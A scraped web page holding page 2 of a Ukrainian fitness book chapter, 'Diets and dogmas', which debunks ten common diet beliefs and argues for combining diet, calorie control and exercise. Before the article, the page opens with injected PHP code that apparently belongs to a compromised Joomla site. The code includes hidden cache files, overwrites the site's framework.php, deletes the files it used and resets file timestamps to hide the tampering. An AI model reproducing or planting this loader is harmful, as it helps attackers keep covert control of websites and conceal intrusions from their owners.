$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Дієти і догми (2-16) | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Дієти і догми (2-16)

Теорія и практика жироспалювання

сторінка 2 з 16
ЗМІСТ

Дієти захлинули інформаційний простір приблизно з другої половини 20 століття з розвитком індустріальних методів переробки продуктів і систем швидкого харчування.

Продукти, що пройшли багаторазову обробку, втрачають частину своїх корисних властивостей. Крім того, для збільшення прибутку і обороту товарів, існує велика кількість методів збуту товарів. Нав'язлива реклама, зниження ціни в порівнянні з натуральними і корисними продуктами, використання хімічних засобів для підсилення смаку й інші методи примушують людей купувати те, що продається в магазині. Проблема ожиріння не змусила себе довго чекати. Саме тоді й отримали популярність дієти, як "універсальний засіб" боротьби із зайвою вагою.

З розвитком мережі Інтернет, інформації про дієти, добавки і т.д., мабуть, стало ще більше, ніж реклами самих товарів. Змусити людину сісти на дієту куди більш просто, ніж змусити його купити, скажімо, ту чи іншу річ, необхідну, наприклад, в побуті. А продавати БАДи, користуючись лінню людини, стало набагато вигідніше, ніж продавати корисні поради.

Але скільком людям реально допомогла тільки дієта або диво-препарати? Скільки схудлих людей серед ваших знайомих, які постійно утримують результат, не страждаючи, виглядають не просто виснаженими, а красивими і здоровими?

У світі дієт і фітнеса все рясніє догмами, які зводяться в абсолютну ыстину. Давайте розберемо деякі загальновідомі догми, і як вони сприймаються людьми:

1. "Не об'їдатися - і проблема зайвої ваги вирішена"

Що значить "не об'їдатися"? Я не вірю, що є багато людей, які постійно переїдають. В більшості своїй, повні люди, з якими я працюю, як правило, не так уже й багато їдять. Вони просто їдять дуже насичені калорії, які можуть і не викликати тяжкості в шлунку.

Наприклад, споживаючи вранці всього один бутерброд з маслом з джемом, суп і печеню на обід, ввечері всього невелику тарілку макаронів з котлетами, одним шматочком хліба і випиваючи один стаканчик пива, можна поставити великий і жирний хрест на схудненні назавжди, а через 20 років такого харчування набрати 30-40 кг зайвої ваги (що часто й відбувається). Навіть на вскидку в раціоні більше 3000 ккал. Інша частина проблеми - це низька якість калорій, тобто фактично шкідлива їжа з переважанням цукру і шкідливих жирів.

Як же розуміється гасло "не об'їдатися і проблема вирішена"?

А розуміється він буквально ... жінки просто відмовляються від усього. І від того, що шкідливо і від того, що просто необхідно.

Аналогічною є друга догма:

2. "Все, що має значення - це кількість калорій"

Тобто досить з'їдати менше, ніж споживати і ви будете худнути. Однак, очевидно, що шматок масла в 150 ккал і яблуко в 150 ккал не одне й те саме. Якість калорій безпосередньо визначає результат вашої битви з зайвим жиром. Пізніше я буду пояснювати таку річ, як термічний ефект їжі і глікемічний індекс продуктів і що це взагалі таке. До речі, глікемічний індекс продуктів також породив чергову догму:

3. Вибирайте тільки продукти з низьким глікемічним індексом і все буде добре.

"Все, що має значення - це якість калорій, а не їх кількість" (популярний гасло практично кожної низьковуглеводної дієти і низькоглікемічних монодієт).

Ви можете їсти одну траву, але тоді ви ризикуєте з'їсти занадто мало калорій, що спричинить до включення аварійного запасання жиру і спалюванню м'язів. Хочете ви цього чи ні, але вам необхідно буде є не тільки овочі, але також і м'ясо і вуглеводи, які мають досить високий глікемічний індекс. Заглиблюватися в крайності і їсти одне масло, у якого просто божевільна калорійність або цукор, у якого найвищий глікемічний індекс така ж дурість, як і жувати одну петрушку з капустою (а-ля капустяна дієта). Важливість балансу калорій я буду розкривати в цій книзі пізніше.

4. "Здоровий спосіб життя - шлях до схуднення" і "не їжте шкідливе, їжте корисне і будете здорові і стрункі".

Ще одне в принципі правильне судження, але дивіться, як можна повернути цю істину іншою стороною.

Здоров'я - безумовно, найважливіша частина жироспалювання , проте не завжди є синонімом слова "стрункість". Якщо ви будете їсти корисних калорій більше, ніж витрачаєте, то будете поправлятися, хоча, звичайно, у вас буде здоров'я. Я знаю людей, у яких є 10-15 зайвих кіло жиру, але не дивлячись на це у них просто чудове здоров'я ... такі собі рожеві бадьорі поросята.

5. "Менше їж - більше рухайся".

В принципі правильно, але ... Нічого, як правило, не йдеться про те, скільки конкретно займатися і скільки конкретно є. Це часто закінчується серцевим нападом на біговій доріжці. Загалом, поняття "більше", "менше" хороші як абстрактні вислови, але практичної користі від них небагато.

Крім того, тотальний контроль над шкідливими продуктами - річ виснажлива, і рано чи пізно ваша воля дасть тріщину. Замучений  голодом організм зірветься, і вся ваша рішучість і сила волі розсіються як повітря з лопнувшого міхура.

6. "Спорт - ключ до схуднення"

Мені один раз написали. Всі знають, що якщо займатися спортом, то станеш струнким, тому що спортсмени і так стрункі ...

По-перше, в цій книзі я не закликаю вас займатися спортом. До того ж ... яких спортсменів ви мали на увазі? Сумоїста, між іншим, теж спортсмени, причому тренуються не менше, ніж, скажімо, бігуни. Борці теж спортсмени, але якщо я помиляюся, то як ви поясните наявність жиру на животі у багатьох з них.

По-друге, спорт і фізичні вправи - це не одне і те ж. У цій книзі є окрема глава, присвячена даному питанню. Якщо ви мали на увазі вправи, як частину деяких видів спорту, то без харчування та обліку інших інструментів, необхідних для боротьби із зайвою жиром, вони не є панацеєю.

7. "Не їсти після 6 години вечора"

Дана догма спливла після того, як всі проблеми із зайвою вагою зіштовхнули на їжу безпосередньо перед сном або вночі.

Так, дійсно, перед сном не має сенсу багато їсти, але не все так просто. Якщо ви їсте в загальній складності набагато більше калорій, ніж потрібно, то не має принципового значення, чи будете ви їсти після 6 вечора чи ні.

Найбільша помилка - це "віддай ворогові вечерю". Якщо ваші тренування припадають на 7-8 вечора, а після тренування ви не відновите сили збалансованим прийомом їжі, то можна сказати, що ви не тільки не зробили добре для свого організму, але і нашкодили йому.

Крім того, дане твердження не витримує ніякої критики, якщо я в 5:50 (наприклад) наїмся солодким, жирним, та так, що важко буде встати з-за столу, то цілком імовірно, що більш пізню вечерю мені буде просто лінь їсти. Ясно, що ні про яке схуднення й мови бути не може.

Я обіцяю, що ви в майбутньому забудете, що таке страх перед вечірнім прийомом їжі. Ви будете боятися пропустити прийом їжі - це я вам можу гарантувати.

8. "Їжте дрібно"

Гарне правило, але без урахування якості і кількості калорій, а також без урахування часу розподілу прийомів їжі і типів калорій протягом дня, не має багато користі. У главі про розподіл їжі протягом дня буде розкрита дана тема.

9. "Виключіть вуглеводи і можна їсти стільки, скільки душі завгодно, ви ніколи не поправитесь"

Привіт Кремлівка та інші клони Аткінса. Немає такого поняття - їж, скільки хочеш, тому що за законом фізики (який ніхто, взагалі-то не скасовував) якщо ви будете їсти більше, ніж спалювати, то не має значення, яка це буде дієта. Багато людей, що сидять на низьковуглеводних дієтах, радіють, спостерігаючи зниження ваги, але я вам пізніше розповім принцип дії низьковуглеводних дієт.

10. "У мене є зайва вага"

Немає такого поняття, як "зайву вагу". Є поняття зайвий жир. Я знаю людей, що важать 90 кг, але які мають гарне тіло без жиру. Також я знаю людей, вага яких не перевищує 65 кг, але мала кількість м'язів і велика кількість жиру робить їх "маленьким товстуна". У них немає "зайвої ваги", але є багато зайвого жиру. Орієнтуйтеся на жир і забудьте таке поняття, як "зайву вагу", тому що у цій програмі ми будемо скидати жир, а не скидати вагу.

Це базові омани (існують й інші), які розбивають людей на кілька, а точніше, на безліч ворогуючих таборів.

Чого тільки не придумають для позбавлення від жиру ... Голодування, клізми, капустяні дієти, дієта по групі крові, дієта за знаком зодіаку, кодування, таблетки для схуднення, магія ... Всі ці брехло-ефективні способи  - тиск на ваше ліниве "я", яке вперто не бачить (чи не хоче бачити) справжніх, реально діючих інструментів, які в кожного під рукою безкоштовно і в будь-який час. У книзі я буду розповідати про лінь і мотивації, про брехню у сфері фітнесу, медицини та інших речах.

Отже, давайте підведемо підсумки вищесказаному. Що вдає із себе система, викладена в цій книзі?

Ця програма навчить вас думати та аналізувати. Ви станете здатні не тільки відрізняти брехливі гасла від правдивих, а також розуміти, що одне правдиве гасло - це не є комплексне рішення комплексної проблеми. І навіть якщо воно виглядає дуже і дуже правдоподібно, не забувайте, що існують тисячі інших менш помітних деталей, які можуть зіграти вирішальну роль у вашому випадку.

Ви можете чесно трудитися в залі 6 днів на тиждень, їсти тільки корисне, але забудете порахувати кількість калорій або не врахуєте якусь дрібницю, кинуту машинально в рот, або помилково рахуєте калорії, і цей єдиний маленький нюанс не дасть вам скинути жир. Ви втратите віру у все, затаврувавши свою дієту і тренування чорним хрестом, хоча вас від успіху, цілком можливо, відділяв лише один крок.

Або ... ви будете рахувати калорії і їсти правильно і навіть займатися в залі, але кількість або інтенсивність тренувань буде недостатнім для скидання жиру. Ви почнете панікувати і кинете (і найстрашніше, що більше ніколи не почнете).

Це лише деякі приклади того, як невидимі оку недосвідченому фактори зумовлюють ваші результати. Повірте, не існує такого поняття, як доля, удача, невдача. Тіло працює за чітко спланованим природою алгоритмом. Ваше серце, нирки, шлунок, і інші органи працюють як годинник, якщо ви їх, звичайно, не руйнуєте. Жир також є частиною чітко функціонуючої системи, яка піддається цілком конкретним закономірностям. Ваше завдання - знайти таке поєднання інструментів, яке відкриє вам доступ до панелі управління своїм жиром.

Я не закликаю вас відразу ж відмовлятися від вашої дієти. Практично не буває поганих дієт (за винятком явно абсурдних), але пам'ятайте, що дієти для більшості людей не є універсальним інструментом вирішення проблеми зайвої ваги. Відштовхуйтеся від реальних результатів, підключайте інші методи та засоби боротьби з зайвим жиром, і тоді шанси знайти ідеально працюючу саме для вас комбінацію, зростуть у багато разів.

Іноді, звичайно, у важких випадках люди так все запускають, що потрібно починати все з чистого аркуша.

Це, як правило, люди, які сидять або на екстремально жорстких дієтах, або ті, хто взагалі плює на свій спосіб життя та харчування. Таким людям потрібно практично заново вчитися ходити. Однак, якщо у вас вже є певний досвід у боротьбі з жиром, якщо ви вже досягли непоганих результатів, то цілком можливо, що вам потрібно внести лише невеликі зміни для досягнення найкращих результатів.

Пам'ятаєте, чим ближче ви знаходитесь до ідеалу, тим більш тонке маніпулювання такими інструментами необхідно для подальшого просування. Якщо для новачка, що має 50 кг зайвої ваги підійде просте обмеження в шкідливому і плавання 3 рази на тиждень для того, щоб почати худнути, то коли у вас залишиться 4-5 кг зайвого жиру, вам потрібно прикласти в сотню разів більше зусиль для того, щоб досягти піку своїх можливостей і зробити своє тіло ідеальним.

Красиве тіло, гідне роботи фотографа - це титанічна праця, тому не будуйте ілюзій щодо того, що це дається саме собою.

Я тут не даю ніякого чіткого раціону харчування, не даю розпорядження. Цей метод сам включає в себе такі поняття, як здоровий спосіб життя, дієта, фізичні вправи і т.д., а не навпаки.

Ви вже користуєтесь одним інструментом з мого набору. Різниця між вами і мною в тому, що я користуюся вже декількома інструментами, от і все.

Інструмент - це якесь засіб, за допомогою якого ви досягаєте тієї чи іншої мети.

Інструментом може бути все що завгодно. Існують більш складні інструменти, які складаються з більш простих інструментів. Наприклад тренування - це більш складні інструменти, які включають в себе свої інструменти (кардіо тренування і силові тренування), кожне тренування, у свою чергу, підрозділяється на свої інструменти. Наприклад, на тип тренування, інтенсивність, тривалість, частоту. Навіть такі поняття, як час проведення тренування будуть інструментами. Ранкова і вечірнє тренування - це два різних інструменту. Навіть відсутність тренування - це інструмент, який ви використовуєте як відновлення.

Далі, інструментами можуть бути продукти харчування (як комплексний інструмент), так і калорій (як більш простий інструмент). Далі, до інструментами можна віднести кількість калорій, якість калорій, час прийому їжі, баланс калорій і т.д. Навіть спосіб приготування продукту - це інструмент.

Відсутність їжі - це теж інструмент. Якщо ви не їсте шкідливе, то ви оздоровлює свій організм, тому що їсте корисне.

Для кожної цілі буде потрібен свій певний набір інструментів. Цей набір, можливо, буде в чомусь схожий у кожного з нас.

Наприклад, ви чоловік, що має 100 кг ваги. Просте обмеження в шкідливої їжі, невелика фізична активність дадуть результати практично відразу. Однак, з кожним етапом у міру наближення до фінальної мети ваш набір і складність комбінацій інструментів будуть збільшуватися. Вам буде потрібно не просто враховувати калорійність продуктів, але й розподіл типів калорій протягом дня, а також їх кількість і багато іншого, про що я буду говорити пізніше. Якщо раніше вистачало просто плавання, то в майбутньому доведеться додавати й силові тренування, а також комбінувати їх тип, частоту і багато іншого.

Для різних людей, які, загалом-то, хочуть практично одного, шлях буде різним, хоча й схожим у багатьох моментах.

У силу генетики, статі, віку, рівня підготовки, для кожної людини набір інструментів буде різний. Вік, стать, генетика - це теж інструменти, які виконують свою функцію. Наприклад, якщо у вас є потужний вроджений інструмент у вигляді гарної генетики (швидкий метаболізм), то він зробить за вас велику частину роботи. Вам потрібно буде лише виключити шкідливий фактор, і ви станете стрункими. Я знаю людей з такою генетикою, які взагалі не сиділи на дієтах і не займалися спортом, але мають просто видатне тіло.

Завдання цієї книги дати загальні базові поняття та приклади для закріплення, щоб ви самі змогли будувати будь-яку програму, що складається з різних комбінацій інструментів для досягнення тих чи інших цілей. У даному контексті ці знання направлені на досягнення досить конкретної мети - гарне тіло і відсутність жиру.

Якщо на вас, скажімо, чудово діє кремлівська дієта, то не кидайте її, якщо вам зовсім комфортно і легко на ній худнути. Значить для ваших завдань одного інструмента поки що вистачає з головою.

Звичайно, результат, досягнутий за допомогою тільки одного інструменту, дуже і дуже нестабільний, оскільки якщо у вас його виб'ють з рук, ви станете безпорадними. Крім того, досягнення результату за допомогою одного інструмента, як правило, дуже і дуже трудомісткий і тривалий процес навіть для обдарованих в генетичному плані людей. Я розумію вас, що вам ліньки йти в спортзал, тому що начебто б легше просто зрізати вуглеводи і отримувати такий-сякий, але все таки результат. Але чи дійсно це легше? ..

Наприклад, ви змушені сидіти на білках і овочах протягом 4 місяців для зниження 5 кг ваги (чисто гіпотетично припустимо, що це дійсно тільки жир ... що практично нереально, втім). Ви позбавляєте себе улюбленої картоплі, рису, фруктів і т.д. Скільки реально ви простягнеться на такій дієті? Чи не простіше просто використовувати 3 інструменту, такі, як, наприклад, контроль калорій, фізичні вправи і контроль якості калорій. Ви за 2 місяці доб'єтеся куди більших результатів, не мучичи себе низьковуглеводними дієтами. Детальніше я буду розбирати низьковуглеводні дієти і пояснювати принцип їх дії на організм.

Якщо ж ви стрибаєте з одної дієти на іншу, то, грубо кажучи, ви лише міняєте "шило на мило", не додаючи ніяких принципово нових інструментів у ваш набір. Дієта - це лише складовий елемент, необхідний (вкрай необхідний) в боротьбі із зайвою вагою, але не єдиний.

Так само, якщо ви себе мучите в клубі, проводячи по 12 годин на тиждень в спортзалі, то чи не здається вам, що логічніше було б додати у ваш арсенал такий корисний інструмент, як дієта. Замість того, щоб наполегливо спалювати 400 ккал тортика, чи не простіше його не їсти взагалі? Вам потрібно спалювати жир, а для того, щоб до нього дістатися, вам потрібно спочатку спалити те, що ви з'їли.

Що таке метаболізм людини? - По суті це одне з базових засобів боротьби з жиром, ще один інструмент. Це, грубо кажучи, піч, що складається з м'язів, і інших органів, за допомогою якої ви спалюєте калорії.

Що таке жир? Це всього лише калорії, запасені у вигляді тканини. Що таке калорії? Це енергія.

Спалювання жиру - це спалювання калорій або спалювання енергії.

Тренування, дієта і ін - це дрова, сірники, папір, сокира,  тобто приналежності або інструменти, необхідні для створення і підтримання високої температури горіння вогнища.

Метод, викладений у цій книзі - це не дієта, це не тренування, це не калорії. Це все разом. Це принципи взаємодії між інструментами або засобами (називайте їх як завгодно), які необхідні для досягнення тих чи інших результатів.

Далі почнемо по пунктах розбирати інструменти, необхідні вам для боротьби із зайвою вагою (жиром), а також розбивати старі міфи, якими обросли дійсно гарні способи, а також міфи, що породили брехлоспособи схуднення.

Але перед тим, як ви поринете в світ фітнесу, калорій, тренувань, таблиць і ви будете бігти купувати собі спортивний одяг, я хотів би попросити вас затриматися небагато.

Я б хотів представити вашій увазі главу під назвою "мотивація і цілі". Це дуже важливий розділ.

<попередня || наступна> ЗМІСТ 
Харчування-здоровий спосіб життя Дієти і догми (2-16)